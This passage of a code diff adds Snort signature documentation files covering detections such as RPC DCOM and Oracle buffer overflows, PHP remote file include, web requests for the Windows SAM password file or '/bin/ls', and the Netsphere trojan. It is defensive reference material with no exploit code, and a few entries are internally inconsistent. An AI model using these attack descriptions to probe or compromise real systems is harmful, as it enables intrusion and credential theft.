+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3214.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3214
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2877.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2877
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_site_priority_site
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1851.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1851
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000802.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000802
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BosClassifieds" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "insPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "insPath" parameter in the "index.php" script used by the "BosClassifieds" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BosClassifieds
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2430.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2430
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/988.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+988
+--
+Summary:
+This event is generated when an attempt is made to access the Windows Security Accounts Manager (SAM) password file via a web request.
+
+--
+Impact:
+Information gathering - An attacker tried to get the Windows password file
+
+--
+Detailed Information:
+The SAM password file contains Windows logins which are NTLM or LANMAN hashes on Windows NT/2K/XP hosts.
+
+The hash algorithms are weak and can be cracked within few minutes/hours if passwords are weak.
+
+--
+Affected Systems:
+Windows NT 3.x and 4.0
+
+--
+Attack Scenarios:
+If an attacker can get the real SAM file and is able to gain clear text passwords, the host can be compromised using the Administrator's login.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are available. The host may be already compromised depending on the password strength used on the server.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Change all Windows passwords.
+
+Apply appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/3361.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3361
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1056.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1056
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/624.txt
@@ -0,0 +1,64 @@
+Rule:
+--
+Sid:
+624
+
+--
+Summary:
+A tcp packet with it's SYN and FIN flags set was detected.
+
+--
+Impact:
+Information regarding firewall rulesets, open/closed ports, ACLs, and
+possibly even OS type is possible.  This technique can also be used to
+bypass certain firewalls or traffic filtering/shaping devices.
+
+--
+Detailed Information:
+A tcp packet with it's SYN and FIN flags set was detected.  Most
+stacks will respond with an ACK SYN indicating that the port was open,
+whereas a closed port will illicit an ACK RST.  
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of information gathering leading up to another (more directed)
+attack, an attacker may attempt to figure out what ports are
+open/closed on a remote machine.
+
+--
+Ease of Attack:
+Intermediate.  To initiate an attack of this type, an attacker either
+needs a tool that can send packets with the SYN and FIN flags set or
+the ability to craft their own packets.  The former is easy, the later
+requires a more advanced skillset.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine if this particular port would have responded as being open
+or closed.  If open, watch for more attacks on this particular service
+or from the remote machine that sent the packet.  If closed, simply
+watch for more traffic from this host.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000761.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000761
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "PHPWebGallery" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "keyword" parameter in the "comments.php" script used by the "PHPWebGallery" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPWebGallery
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2116.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2116
+
+
+--
+Summary:
+This event is generated when an attempt is made to access the cgi script chipcfg.cgi.
+
+--
+Impact:
+Information gathering. This is an attempt to gain information about the network device and possibly other network information.
+
+--
+Detailed Information:
+The IPC@CHIP is used in network devices for remote access and configuration of the device. It includes an embedded web server, ftp server and telnet daemon.
+
+This could be an attempt to gain intelligence about the device confguration or information on the rest of the network the device is connected to.
+
+--
+Attack Scenarios:
+The attacker merely needs to make an HTTP GET request for the chipcfg.cgi script.
+
+--
+Ease of Attack:
+Simple HTTP GET.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+The script can be rmoved from the device by using the function CGI_REMOVE. Check vendor documentation for details.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2767
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1341
+
+CERT:
+http://www.kb.cert.org/vuls/id/574739
+
+CGI Security:
+http://www.cgisecurity.com/archive/webservers/chip_multi_holes_and_webserver.txt
+
+--
--- /dev/null
+++ b/doc/signatures/291.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+291
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in the Cassandra NNTP service.
+
+--
+Impact:
+Denial of Service.
+
+--
+Detailed Information:
+The denial of service is caused by providing an unusually long login
+name.  The rule looks for a data payload of over 512 characters.
+
+--
+Affected Systems:
+	Cassandra NNTP server v1.10
+
+--
+Attack Scenarios:
+The attack is done remotely and causes denial of service.
+
+--
+Ease of Attack:
+Simple.  An exploit is readily available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the available security patches from your vendor.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS274
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCAN-2000-0341
+
+--
--- /dev/null
+++ b/doc/signatures/1369.txt
@@ -0,0 +1,48 @@
+Rule:
+
+--
+Sid:
+1369
+
+--
+Summary:
+Attempted ps command access via web
+
+--
+Impact:
+Attempt to gain information on system files and filestructure
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the filesystem on a webserver. The ls command lists the files and filesystem layout on a UNIX or Linux based system. The attacker could possibly gain information needed for other attacks on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/ls'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. 
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1368
+
+--
--- /dev/null
+++ b/doc/signatures/155.txt
@@ -0,0 +1,95 @@
+Rule:
+
+--
+Sid:
+155
+
+--
+Summary:
+Netsphere is a Trojan Horse offering the attacker access to the victims 
+filesystem, instant messaging clients and some control over peripherals.
+This event is generated when a Netsphere server responds to an attackers
+client.
+
+--
+Impact:
+Compromise of data integrity on the victim host as well as the 
+possibility of rendering the machine temporarily unusable.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Netsphere
+sever to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+The Trojan also gives the attacker the ability to access the victims 
+filesystem, turn the monitor on and off, control the mouse, access 
+instant messaging applications and render a pentium based machine 
+unusable.
+
+The Trojan is also known to use TCP ports 30100, 30101 and 30102.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named NetSphereServer.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	NSSX
+
+Removal of this entry is required.
+
+Delete the file NetSphereServer.exe.
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS76
+
+--
--- /dev/null
+++ b/doc/signatures/2640.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2640
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_mview_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gowner" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck90.html
+
+--
--- /dev/null
+++ b/doc/signatures/2012.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2012
+
+--
+Summary:
+CVS is the Concurrent Versions System, commonly used to 
+help manage software development.
+
+--
+Impact:
+This may be an intelligence gathering activity or an attempt to connect 
+to CVS using the credentials of a user with escalated privileges. Should
+this attempt be succesful the entire CVS repository may be compromised.
+
+--
+Detailed Information:
+This rule detects attempts to connect to a CVS repository that fail due 
+determined activity by an attacker to gain unauthorized access to the 
+CVS respository.
+
+The source code of software in the repository may be compromised by a 
+succesful attacker who could choose to insert malicious code of his own 
+making.
+
+For CVS daemons running under changed root conditions (chroot), the rest
+of the operating system files may be protected but the entire CVS 
+directory structure and contents is vulnerable.
+
+--
+Affected Systems:
+	All versions of CVS
+	
+--
+Attack Scenarios:
+This may be an intelligence gathering activity or an attempt to log in 
+to CVS using the credentials of an authorized user.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+It is possible that the cvsroot on the server is misconfigured. Check 
+permissions on the cvsroot to ensure the repository is writable by the 
+cvsdaemon.
+
+--
+False Negatives:
+Connections to the server using zlib compression will not generate this
+event.
+
+--
+Corrective Action:
+Disable the CVS daemon in the file /etc/inetd.conf. Run the CVS daemon 
+as a user other than root that does not have a valid login to the 
+machine.
+
+Disable anonymous cvs access to the server where appropriate.
+
+Maintain checks on the password database and the CVS repository.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVS:
+http://www.cvshome.org/docs/
+
+--
--- /dev/null
+++ b/doc/signatures/1968.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1968
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1067.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+1067
+
+--
+Summary:
+This event is generated when the NET command is used for message sending, remote null session connections etc.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+An attacker tried to access the "net" command on a host.
+
+The Windows "net" command is usually not accessible through a webserver, check for possible directory traversal attacks.
+
+Net cannot be used to gain full control of a host, but can establish null sessions on weakly protected Windows hosts for example or to gain information on the network the host is connected to.
+
+--
+Attack Scenarios:
+A web request for the command "net".
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A valid URL request containing the string "net.exe" can generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Protect "net.exe" from remote usage. Remove the file completly if it is 
+not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2994.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2994
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000478.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000478
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "aWebNews" application running on a webserver. 
+Access to the file "visview.php" using a remote file being passed as the 
+"path_to_news" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "path_to_news" parameter in the "visview.php" script 
+used by the "aWebNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using aWebNews
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3117.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3117
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3390.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3390
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
